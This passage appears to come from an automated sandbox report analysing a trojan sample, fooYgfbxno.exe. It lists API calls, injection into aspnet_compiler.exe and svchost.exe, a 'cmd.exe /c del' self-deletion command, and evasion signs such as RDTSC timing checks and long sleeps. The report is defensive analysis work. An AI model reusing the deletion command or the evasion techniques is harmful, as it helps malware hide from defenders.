          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0392F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0393B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039D1EB6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03945600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03946E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E2D82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0393D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03920D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4496
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0393841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394B477
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7C950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C68C6B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C68C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C62D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7BE42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7C66C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7CFB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C62FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0151B150 appears 139 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B150 appears 145 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004185D0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418680 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418700 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004185CA NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041867A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004186CB NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004187AA NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015599D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0155B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015598A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0155A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0155AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015595F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0155A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0155A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01559610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0396A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0396B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0396A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0396A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0396AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03969560 NtWriteFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C785D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C78680 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C787B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C78700 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C785CA NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C786CB NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7867A NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C787AA NtAllocateVirtualMemory,
          Source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTHEDEVILISHERE.dll> vs fooYgfbxno.exe
          Source: fooYgfbxno.exe, 00000001.00000002.268183318.000000000082C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBMCXBMXCKSKS.exe: vs fooYgfbxno.exe
          Source: fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTHEDEVILISHERE.dll> vs fooYgfbxno.exe
          Source: fooYgfbxno.exe, 00000001.00000002.272166008.0000000003D8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs fooYgfbxno.exe
          Source: fooYgfbxno.exe, 00000001.00000002.268464852.0000000000FAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fooYgfbxno.exe
          Source: fooYgfbxno.exeBinary or memory string: OriginalFilenameBMCXBMXCKSKS.exe: vs fooYgfbxno.exe
          Source: fooYgfbxno.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: fooYgfbxno.exeVirustotal: Detection: 31%
          Source: fooYgfbxno.exeReversingLabs: Detection: 43%
          Source: fooYgfbxno.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\fooYgfbxno.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\fooYgfbxno.exe "C:\Users\user\Desktop\fooYgfbxno.exe"
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Users\user\Desktop\fooYgfbxno.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fooYgfbxno.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@10/6
          Source: C:\Users\user\Desktop\fooYgfbxno.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4804:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\fooYgfbxno.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: fooYgfbxno.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: fooYgfbxno.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: fooYgfbxno.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: fooYgfbxno.exe
          Source: Binary string: THEDEVILISHERE.pdb source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: fooYgfbxno.exe
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: svchost.exe, 0000000C.00000002.530634745.0000000003E37000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041B87C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041B812 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041B81B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040D155 push ecx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418A7B push ss; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00416232 push 00000005h; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041BCD2 push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418CD8 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00415588 push esi; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00415F51 push CA8369B7h; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041B7C5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0156D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0397D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7B87C push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7B812 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7B81B push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C6D155 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C78A7B push ss; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C76232 push 00000005h; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7BCD3 push esp; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C78CD8 push edx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C75588 push esi; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C7B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00C75F51 push CA8369B7h; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.92488075838
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000C68604 second address: 0000000000C6860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000C6898E second address: 0000000000C68994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\fooYgfbxno.exe TID: 6284Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7084Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 5440Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\fooYgfbxno.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 6.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 5.9 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\fooYgfbxno.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: explorer.exe, 00000003.00000000.303097159.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
